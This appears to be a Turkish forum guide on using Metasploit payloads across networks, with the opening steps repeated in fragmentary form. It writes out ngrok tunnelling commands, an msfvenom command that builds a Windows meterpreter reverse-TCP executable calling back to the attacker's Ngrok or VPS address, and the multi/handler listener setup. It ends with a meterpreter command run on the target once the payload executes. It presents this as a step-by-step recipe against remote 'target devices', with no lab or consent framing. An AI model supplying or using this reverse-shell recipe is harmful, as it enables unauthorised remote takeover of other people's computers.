Herkese merhaba,
Bu rehberde, Metasploit ile aynı ağda olmadan payload kullanımı hakkında detaylı bilgiler ve adım adım bir açıklama sunacağız.
Ngrok, localhost üzerinde çalışan bir servisi internete açık bir URL’ye yönlendirebilir.
1)
2) Ngrok’u indirip yükleyin:
3) Ngrok, dışarıya açık bir IP ve port sağlayacaktır. Bu bilgiyi kaydedin.
Metasploit’te farklı ağlarda çalışacak bir payload oluşturmak için:
Bu ayarlar, payload geri bağlantı yaptığında Metasploit üzerinden oturum açmanızı sağlar.
Bu komutla hedef cihazın işletim sistemi ve bilgilerini görebilirsiniz.
Bu rehberde, Metasploit ile aynı ağda olmadan payload kullanımı hakkında detaylı bilgiler ve adım adım bir açıklama sunacağız.
Metasploit ile Farklı Ağlarda Çalışma Mantığı
Farklı ağlarda çalışmak için temel prensip, hedef cihazın Metasploit sisteminize geri bağlanmasını sağlamaktır. Bu işlem için kullanılan yöntemler:- Port Yönlendirme (Port Forwarding): Hedef cihazın internete açık bir IP adresine bağlanmasını sağlamak.
- VPN veya Proxy Kullanımı: Hedef cihazla arada bir bağlantı tüneli oluşturmak.
- Cloud Sunucular (VPS): Payloadların geri bağlantı yapabileceği bir sunucu kurmak.
Gerekli Araçlar ve Hazırlıklar
Bu süreçte ihtiyacınız olacak araçlar:- Metasploit Framework
- Ngrok veya benzeri bir tünelleme aracı
- Cloud Sunucusu (Opsiyonel)
- Port Yönlendirme Ayarları
Adım 1: Ngrok veya Sunucu Ayarları
Ngrok, localhost üzerinde çalışan bir servisi internete açık bir URL’ye yönlendirebilir.Ngrok, localhost üzerinde çalışan bir servisi internete açık bir URL’ye yönlendirebilir.
1)
Ziyaretçiler için gizlenmiş link,görmek için
Giriş yap veya üye ol.
üzerinden ücretsiz bir hesap oluşturun ve API anahtarınızı alın.2) Ngrok’u indirip yükleyin:
Kod:
./ngrok authtoken [API_ANAHTARINIZ]
./ngrok tcp 4444
3) Ngrok, dışarıya açık bir IP ve port sağlayacaktır. Bu bilgiyi kaydedin.
Adım 2: Payload Oluşturma
Metasploit’te farklı ağlarda çalışacak bir payload oluşturmak için:
Kod:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=[Ngrok_IP veya VPS_IP] LPORT=[Ngrok_Port] -f exe > payload.exe
- LHOST: Ngrok’un size verdiği IP veya VPS IP adresiniz.
- LPORT: Ngrok veya VPS üzerinden belirttiğiniz port numarası.
Adım 3: Metasploit Ayarlarını Yapılandırma
Metasploit’te ilgili handler’ı başlatın:
Kod:
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT [Ngrok_Port]
exploit
Adım 4: Test ve Güvenlik Kontrolleri
Hedef cihaz, payload çalıştırıldığında, Metasploit konsolunda bir oturum açılacaktır:
Kod:
meterpreter > sysinfo